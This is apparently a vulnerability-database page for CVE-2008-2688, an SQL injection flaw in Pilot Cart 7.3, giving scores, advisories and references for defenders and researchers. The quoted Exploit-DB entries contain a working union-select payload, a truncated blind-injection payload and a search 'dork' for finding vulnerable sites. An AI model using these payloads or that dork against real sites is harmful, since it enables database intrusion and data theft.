CVE-2008-2688
Published: 2008-06-13
Priority: P3 (45) · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 2.01% (78.4th percentile)
SQL injection vulnerability in pilot.asp in ASPilot Pilot Cart 7.3 allows remote attackers to execute arbitrary SQL commands via the article parameter in a kb action.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pilotcart | pilot_cart | — | — |
GHSA
GHSA-fj3j-c3hf-8gqj: Multiple SQL injection vulnerabilities in ASPilot Pilot Cart 7
ghsa_unreviewed · 2022-05-17 · CVSS 7.5 · CVE-2010-4632 [HIGH] · CWE-89
Multiple SQL injection vulnerabilities in ASPilot Pilot Cart 7.3 allow remote attackers to execute arbitrary SQL commands via the (1) article parameter to kb.asp, (2) specific parameter to cart.asp, (3) countrycode parameter to contact.asp, and the (4) srch parameter to search.asp. NOTE: the article parameter to pilot.asp is already covered by CVE-2008-2688.
GHSA
GHSA-5582-39pc-mhm8: SQL injection vulnerability in pilot
ghsa_unreviewed · 2022-05-01 · CVE-2008-2688 [HIGH] · CWE-89
SQL injection vulnerability in pilot.asp in ASPilot Pilot Cart 7.3 allows remote attackers to execute arbitrary SQL commands via the article parameter in a kb action.
No detection rules found.
Exploit-DB
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
exploitdb · 2010-11-07 · CVSS 7.5 · CVE-2010-4632 [HIGH]
---
# Title: [ASPilot Pilot Cart 7.3 multiple vulnerabilities]
# Date: [07.11.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3]
# CVE Reference: CVE-2008-2688 (only 1 SQL injection)
# EDB-ID: 5765 (only 1 SQL injection)
# Ariko-Security: Security Audits (Audyt bezpieczeństwa)
# Advisory: 745/2010
============ { Ariko-Security - Advisory #1/11/2010 } =============
ASPilot Pilot Cart 7.3 multiple vulnerabilities
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart
# version last 7.3
Vulnerability Info:
# Type: multiple SQL injections, multiple XSS, multiple iFrame injections, multiple link injections
Exploit-DB
ASPilot Pilot Cart 7.3 - 'article' SQL Injection
exploitdb · 2008-06-09 · CVE-2008-2688
---
[+] Script Name : Pilot Cart 7.3 Remote SQL Injection Exploit
[+] Team : injEct0r5
[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
[+] Script URL : www.pilotcart.com
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
[+] Expl0iT :
pilot.asp?pg=kb&article={SQL}
{SQL} --> 115+union+select+Name,Name,Name+from+msysobjects
Or blind it :
{SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(sele
No writeups or analysis indexed.
References:
http://secunia.com/advisories/30176
http://www.securityfocus.com/bid/29615
https://exchange.xforce.ibmcloud.com/vulnerabilities/42946
https://www.exploit-db.com/exploits/5765